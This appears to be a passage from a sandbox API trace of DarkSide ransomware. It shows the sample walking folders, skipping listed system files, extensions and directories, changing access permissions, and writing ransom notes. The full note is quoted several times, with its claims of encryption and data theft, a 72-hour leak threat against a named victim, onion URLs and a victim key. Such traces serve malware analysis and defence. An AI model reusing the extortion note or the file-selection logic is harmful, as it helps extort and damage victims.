MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0148.944] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0148.946] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0148.947] CloseHandle (hObject=0x1c) returned 1 [0148.947] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0148.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 0x14 [0148.948] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="" [0148.948] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 0x36 [0148.948] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0148.948] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xd763ee00, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd763ee00, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.948] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.948] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0148.948] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0148.948] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0148.948] wcslen (_String="autorun.inf") returned 0xb [0148.948] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0148.948] wcslen (_String="boot.ini") returned 0x8 [0148.948] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0148.948] wcslen (_String="bootfont.bin") returned 0xc [0148.948] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0148.948] wcslen (_String="bootsect.bak") returned 0xc [0148.948] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0148.948] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0148.948] _wcsicmp (_Str1="Favorites.vss", _Str2="README.c06622a1.TXT") returned -12 [0148.948] wcsstr (_Str="Favorites.vss", _SubStr="README") returned 0x0 [0148.948] _wcsicmp (_Str1="autorun.inf", _Str2="Favorites.vss") returned -5 [0148.948] wcslen (_String="autorun.inf") returned 0xb [0148.948] _wcsicmp (_Str1="boot.ini", _Str2="Favorites.vss") returned -4 [0148.948] wcslen (_String="boot.ini") returned 0x8 [0148.948] _wcsicmp (_Str1="bootfont.bin", _Str2="Favorites.vss") returned -4 [0148.948] wcslen (_String="bootfont.bin") returned 0xc [0148.948] _wcsicmp (_Str1="bootsect.bak", _Str2="Favorites.vss") returned -4 [0148.949] wcslen (_String="bootsect.bak") returned 0xc [0148.949] _wcsicmp (_Str1="desktop.ini", _Str2="Favorites.vss") returned -2 [0148.949] wcslen (_String="desktop.ini") returned 0xb [0148.949] _wcsicmp (_Str1="iconcache.db", _Str2="Favorites.vss") returned 3 [0148.949] wcslen (_String="iconcache.db") returned 0xc [0148.949] _wcsicmp (_Str1="ntldr", _Str2="Favorites.vss") returned 8 [0148.949] wcslen (_String="ntldr") returned 0x5 [0148.949] _wcsicmp (_Str1="ntuser.dat", _Str2="Favorites.vss") returned 8 [0148.949] wcslen (_String="ntuser.dat") returned 0xa [0148.949] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Favorites.vss") returned 8 [0148.949] wcslen (_String="ntuser.dat.log") returned 0xe [0148.949] _wcsicmp (_Str1="ntuser.ini", _Str2="Favorites.vss") returned 8 [0148.949] wcslen (_String="ntuser.ini") returned 0xa [0148.949] _wcsicmp (_Str1="thumbs.db", _Str2="Favorites.vss") returned 14 [0148.949] wcslen (_String="thumbs.db") returned 0x9 [0148.949] _wcsicmp (_Str1="386", _Str2="vss") returned -67 [0148.949] wcslen (_String="386") returned 0x3 [0148.949] _wcsicmp (_Str1="adv", _Str2="vss") returned -21 [0148.949] wcslen (_String="adv") returned 0x3 [0148.949] _wcsicmp (_Str1="ani", _Str2="vss") returned -21 [0148.949] wcslen (_String="ani") returned 0x3 [0148.949] _wcsicmp (_Str1="bat", _Str2="vss") returned -20 [0148.949] wcslen (_String="bat") returned 0x3 [0148.949] _wcsicmp (_Str1="bin", _Str2="vss") returned -20 [0148.949] wcslen (_String="bin") returned 0x3 [0148.949] _wcsicmp (_Str1="cab", _Str2="vss") returned -19 [0148.949] wcslen (_String="cab") returned 0x3 [0148.949] _wcsicmp (_Str1="cmd", _Str2="vss") returned -19 [0148.949] wcslen (_String="cmd") returned 0x3 [0148.949] _wcsicmp (_Str1="com", _Str2="vss") returned -19 [0148.949] wcslen (_String="com") returned 0x3 [0148.949] _wcsicmp (_Str1="cpl", _Str2="vss") returned -19 [0148.949] wcslen (_String="cpl") returned 0x3 [0148.950] _wcsicmp (_Str1="cur", _Str2="vss") returned -19 [0148.950] wcslen (_String="cur") returned 0x3 [0148.950] _wcsicmp (_Str1="deskthemepack", _Str2="vss") returned -18 [0148.950] wcslen (_String="deskthemepack") returned 0xd [0148.950] _wcsicmp (_Str1="diagcab", _Str2="vss") returned -18 [0148.950] wcslen (_String="diagcab") returned 0x7 [0148.950] _wcsicmp (_Str1="diagcfg", _Str2="vss") returned -18 [0148.950] wcslen (_String="diagcfg") returned 0x7 [0148.950] _wcsicmp (_Str1="diagpkg", _Str2="vss") returned -18 [0148.950] wcslen (_String="diagpkg") returned 0x7 [0148.950] _wcsicmp (_Str1="dll", _Str2="vss") returned -18 [0148.950] wcslen (_String="dll") returned 0x3 [0148.950] _wcsicmp (_Str1="drv", _Str2="vss") returned -18 [0148.950] wcslen (_String="drv") returned 0x3 [0148.950] _wcsicmp (_Str1="exe", _Str2="vss") returned -17 [0148.950] wcslen (_String="exe") returned 0x3 [0148.950] _wcsicmp (_Str1="hlp", _Str2="vss") returned -14 [0148.950] wcslen (_String="hlp") returned 0x3 [0148.950] _wcsicmp (_Str1="icl", _Str2="vss") returned -13 [0148.950] wcslen (_String="icl") returned 0x3 [0148.950] _wcsicmp (_Str1="icns", _Str2="vss") returned -13 [0148.950] wcslen (_String="icns") returned 0x4 [0148.950] _wcsicmp (_Str1="ico", _Str2="vss") returned -13 [0148.950] wcslen (_String="ico") returned 0x3 [0148.950] _wcsicmp (_Str1="ics", _Str2="vss") returned -13 [0148.950] wcslen (_String="ics") returned 0x3 [0148.950] _wcsicmp (_Str1="idx", _Str2="vss") returned -13 [0148.950] wcslen (_String="idx") returned 0x3 [0148.950] _wcsicmp (_Str1="ldf", _Str2="vss") returned -10 [0148.950] wcslen (_String="ldf") returned 0x3 [0148.950] _wcsicmp (_Str1="lnk", _Str2="vss") returned -10 [0148.950] wcslen (_String="lnk") returned 0x3 [0148.950] _wcsicmp (_Str1="mod", _Str2="vss") returned -9 [0148.950] wcslen (_String="mod") returned 0x3 [0148.951] _wcsicmp (_Str1="mpa", _Str2="vss") returned -9 [0148.951] wcslen (_String="mpa") returned 0x3 [0148.951] _wcsicmp (_Str1="msc", _Str2="vss") returned -9 [0148.951] wcslen (_String="msc") returned 0x3 [0148.951] _wcsicmp (_Str1="msp", _Str2="vss") returned -9 [0148.951] wcslen (_String="msp") returned 0x3 [0148.951] _wcsicmp (_Str1="msstyles", _Str2="vss") returned -9 [0148.951] wcslen (_String="msstyles") returned 0x8 [0148.951] _wcsicmp (_Str1="msu", _Str2="vss") returned -9 [0148.951] wcslen (_String="msu") returned 0x3 [0148.951] _wcsicmp (_Str1="nls", _Str2="vss") returned -8 [0148.951] wcslen (_String="nls") returned 0x3 [0148.951] _wcsicmp (_Str1="nomedia", _Str2="vss") returned -8 [0148.951] wcslen (_String="nomedia") returned 0x7 [0148.951] _wcsicmp (_Str1="ocx", _Str2="vss") returned -7 [0148.951] wcslen (_String="ocx") returned 0x3 [0148.951] _wcsicmp (_Str1="prf", _Str2="vss") returned -6 [0148.951] wcslen (_String="prf") returned 0x3 [0148.951] _wcsicmp (_Str1="ps1", _Str2="vss") returned -6 [0148.951] wcslen (_String="ps1") returned 0x3 [0148.951] _wcsicmp (_Str1="rom", _Str2="vss") returned -4 [0148.951] wcslen (_String="rom") returned 0x3 [0148.951] _wcsicmp (_Str1="rtp", _Str2="vss") returned -4 [0148.951] wcslen (_String="rtp") returned 0x3 [0148.951] _wcsicmp (_Str1="scr", _Str2="vss") returned -3 [0148.951] wcslen (_String="scr") returned 0x3 [0148.951] _wcsicmp (_Str1="shs", _Str2="vss") returned -3 [0148.951] wcslen (_String="shs") returned 0x3 [0148.951] _wcsicmp (_Str1="spl", _Str2="vss") returned -3 [0148.951] wcslen (_String="spl") returned 0x3 [0148.951] _wcsicmp (_Str1="sys", _Str2="vss") returned -3 [0148.951] wcslen (_String="sys") returned 0x3 [0148.951] _wcsicmp (_Str1="theme", _Str2="vss") returned -2 [0148.951] wcslen (_String="theme") returned 0x5 [0148.952] _wcsicmp (_Str1="themepack", _Str2="vss") returned -2 [0148.952] wcslen (_String="themepack") returned 0x9 [0148.952] _wcsicmp (_Str1="wpx", _Str2="vss") returned 1 [0148.952] wcslen (_String="wpx") returned 0x3 [0148.952] _wcsicmp (_Str1="lock", _Str2="vss") returned -10 [0148.952] wcslen (_String="lock") returned 0x4 [0148.952] _wcsicmp (_Str1="key", _Str2="vss") returned -11 [0148.952] wcslen (_String="key") returned 0x3 [0148.952] _wcsicmp (_Str1="hta", _Str2="vss") returned -14 [0148.952] wcslen (_String="hta") returned 0x3 [0148.952] _wcsicmp (_Str1="msi", _Str2="vss") returned -9 [0148.952] wcslen (_String="msi") returned 0x3 [0148.952] _wcsicmp (_Str1="pdb", _Str2="vss") returned -6 [0148.952] wcslen (_String="pdb") returned 0x3 [0148.952] _wcsicmp (_Str1="sql", _Str2="vss") returned -3 [0148.952] wcslen (_String="sql") returned 0x3 [0148.952] _wcsicmp (_Str1="sqlite", _Str2="vss") returned -3 [0148.952] wcslen (_String="sqlite") returned 0x6 [0148.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 0x14 [0148.952] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd763ee00, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd763ee00, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd763ee00, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.952] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.952] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0148.952] _wcsicmp (_Str1="$recycle.bin", _Str2="_private") returned -59 [0148.952] wcslen (_String="$recycle.bin") returned 0xc [0148.952] _wcsicmp (_Str1="config.msi", _Str2="_private") returned 4 [0148.952] wcslen (_String="config.msi") returned 0xa [0148.952] _wcsicmp (_Str1="$windows.~bt", _Str2="_private") returned -59 [0148.952] wcslen (_String="$windows.~bt") returned 0xc [0148.952] _wcsicmp (_Str1="$windows.~ws", _Str2="_private") returned -59 [0148.952] wcslen (_String="$windows.~ws") returned 0xc [0148.953] _wcsicmp (_Str1="windows", _Str2="_private") returned 24 [0148.953] wcslen (_String="windows") returned 0x7 [0148.953] _wcsicmp (_Str1="appdata", _Str2="_private") returned 2 [0148.953] wcslen (_String="appdata") returned 0x7 [0148.953] _wcsicmp (_Str1="application data", _Str2="_private") returned 2 [0148.953] wcslen (_String="application data") returned 0x10 [0148.953] _wcsicmp (_Str1="boot", _Str2="_private") returned 3 [0148.953] wcslen (_String="boot") returned 0x4 [0148.953] _wcsicmp (_Str1="google", _Str2="_private") returned 8 [0148.953] wcslen (_String="google") returned 0x6 [0148.953] _wcsicmp (_Str1="mozilla", _Str2="_private") returned 14 [0148.953] wcslen (_String="mozilla") returned 0x7 [0148.953] _wcsicmp (_Str1="program files", _Str2="_private") returned 17 [0148.953] wcslen (_String="program files") returned 0xd [0148.953] _wcsicmp (_Str1="program files (x86)", _Str2="_private") returned 17 [0148.953] wcslen (_String="program files (x86)") returned 0x13 [0148.953] _wcsicmp (_Str1="programdata", _Str2="_private") returned 17 [0148.953] wcslen (_String="programdata") returned 0xb [0148.953] _wcsicmp (_Str1="system volume information", _Str2="_private") returned 20 [0148.953] wcslen (_String="system volume information") returned 0x19 [0148.953] _wcsicmp (_Str1="tor browser", _Str2="_private") returned 21 [0148.953] wcslen (_String="tor browser") returned 0xb [0148.953] _wcsicmp (_Str1="windows.old", _Str2="_private") returned 24 [0148.953] wcslen (_String="windows.old") returned 0xb [0148.953] _wcsicmp (_Str1="intel", _Str2="_private") returned 10 [0148.953] wcslen (_String="intel") returned 0x5 [0148.953] _wcsicmp (_Str1="msocache", _Str2="_private") returned 14 [0148.953] wcslen (_String="msocache") returned 0x8 [0148.953] _wcsicmp (_Str1="perflogs", _Str2="_private") returned 17 [0148.953] wcslen (_String="perflogs") returned 0x8 [0148.953] _wcsicmp (_Str1="x64dbg", _Str2="_private") returned 25 [0148.953] wcslen (_String="x64dbg") returned 0x6 [0148.953] _wcsicmp (_Str1="public", _Str2="_private") returned 17 [0148.953] wcslen (_String="public") returned 0x6 [0148.954] _wcsicmp (_Str1="all users", _Str2="_private") returned 2 [0148.954] wcslen (_String="all users") returned 0x9 [0148.954] _wcsicmp (_Str1="default", _Str2="_private") returned 5 [0148.954] wcslen (_String="default") returned 0x7 [0148.954] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*" [0148.954] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 0x37 [0148.954] wcscpy (in: _Dest=0x44e00ec, _Source="_private" | out: _Dest="_private") returned="_private" [0148.954] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.954] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.955] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0148.955] GetNamedSecurityInfoW () returned 0x0 [0148.955] SetEntriesInAclW () returned 0x0 [0148.955] SetNamedSecurityInfoW () returned 0x0 [0148.957] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57518) returned 1 [0148.957] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0148.957] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private")) returned 1 [0148.957] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0148.957] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0148.957] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0148.958] CloseHandle (hObject=0x1c) returned 1 [0148.958] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0148.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private")) returned 0x12 [0148.958] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="" [0148.958] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 0x3f [0148.958] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0148.959] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xd7664f60, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7664f60, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.959] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0148.959] _wcsicmp (_Str1="folder.ico", _Str2="README.c06622a1.TXT") returned -12 [0148.959] wcsstr (_Str="folder.ico", _SubStr="README") returned 0x0 [0148.960] _wcsicmp (_Str1="autorun.inf", _Str2="folder.ico") returned -5 [0148.960] wcslen (_String="autorun.inf") returned 0xb [0148.960] _wcsicmp (_Str1="boot.ini", _Str2="folder.ico") returned -4 [0148.960] wcslen (_String="boot.ini") returned 0x8 [0148.960] _wcsicmp (_Str1="bootfont.bin", _Str2="folder.ico") returned -4 [0148.960] wcslen (_String="bootfont.bin") returned 0xc [0148.960] _wcsicmp (_Str1="bootsect.bak", _Str2="folder.ico") returned -4 [0148.960] wcslen (_String="bootsect.bak") returned 0xc [0148.960] _wcsicmp (_Str1="desktop.ini", _Str2="folder.ico") returned -2 [0148.960] wcslen (_String="desktop.ini") returned 0xb [0148.960] _wcsicmp (_Str1="iconcache.db", _Str2="folder.ico") returned 3 [0148.960] wcslen (_String="iconcache.db") returned 0xc [0148.960] _wcsicmp (_Str1="ntldr", _Str2="folder.ico") returned 8 [0148.960] wcslen (_String="ntldr") returned 0x5 [0148.960] _wcsicmp (_Str1="ntuser.dat", _Str2="folder.ico") returned 8 [0148.960] wcslen (_String="ntuser.dat") returned 0xa [0148.960] _wcsicmp (_Str1="ntuser.dat.log", _Str2="folder.ico") returned 8 [0148.960] wcslen (_String="ntuser.dat.log") returned 0xe [0148.960] _wcsicmp (_Str1="ntuser.ini", _Str2="folder.ico") returned 8 [0148.960] wcslen (_String="ntuser.ini") returned 0xa [0148.960] _wcsicmp (_Str1="thumbs.db", _Str2="folder.ico") returned 14 [0148.960] wcslen (_String="thumbs.db") returned 0x9 [0148.960] _wcsicmp (_Str1="386", _Str2="ico") returned -54 [0148.960] wcslen (_String="386") returned 0x3 [0148.960] _wcsicmp (_Str1="adv", _Str2="ico") returned -8 [0148.960] wcslen (_String="adv") returned 0x3 [0148.960] _wcsicmp (_Str1="ani", _Str2="ico") returned -8 [0148.960] wcslen (_String="ani") returned 0x3 [0148.960] _wcsicmp (_Str1="bat", _Str2="ico") returned -7 [0148.960] wcslen (_String="bat") returned 0x3 [0148.960] _wcsicmp (_Str1="bin", _Str2="ico") returned -7 [0148.960] wcslen (_String="bin") returned 0x3 [0148.961] _wcsicmp (_Str1="cab", _Str2="ico") returned -6 [0148.961] wcslen (_String="cab") returned 0x3 [0148.961] _wcsicmp (_Str1="cmd", _Str2="ico") returned -6 [0148.961] wcslen (_String="cmd") returned 0x3 [0148.961] _wcsicmp (_Str1="com", _Str2="ico") returned -6 [0148.961] wcslen (_String="com") returned 0x3 [0148.961] _wcsicmp (_Str1="cpl", _Str2="ico") returned -6 [0148.961] wcslen (_String="cpl") returned 0x3 [0148.961] _wcsicmp (_Str1="cur", _Str2="ico") returned -6 [0148.961] wcslen (_String="cur") returned 0x3 [0148.961] _wcsicmp (_Str1="deskthemepack", _Str2="ico") returned -5 [0148.961] wcslen (_String="deskthemepack") returned 0xd [0148.961] _wcsicmp (_Str1="diagcab", _Str2="ico") returned -5 [0148.961] wcslen (_String="diagcab") returned 0x7 [0148.961] _wcsicmp (_Str1="diagcfg", _Str2="ico") returned -5 [0148.961] wcslen (_String="diagcfg") returned 0x7 [0148.961] _wcsicmp (_Str1="diagpkg", _Str2="ico") returned -5 [0148.961] wcslen (_String="diagpkg") returned 0x7 [0148.961] _wcsicmp (_Str1="dll", _Str2="ico") returned -5 [0148.961] wcslen (_String="dll") returned 0x3 [0148.961] _wcsicmp (_Str1="drv", _Str2="ico") returned -5 [0148.961] wcslen (_String="drv") returned 0x3 [0148.961] _wcsicmp (_Str1="exe", _Str2="ico") 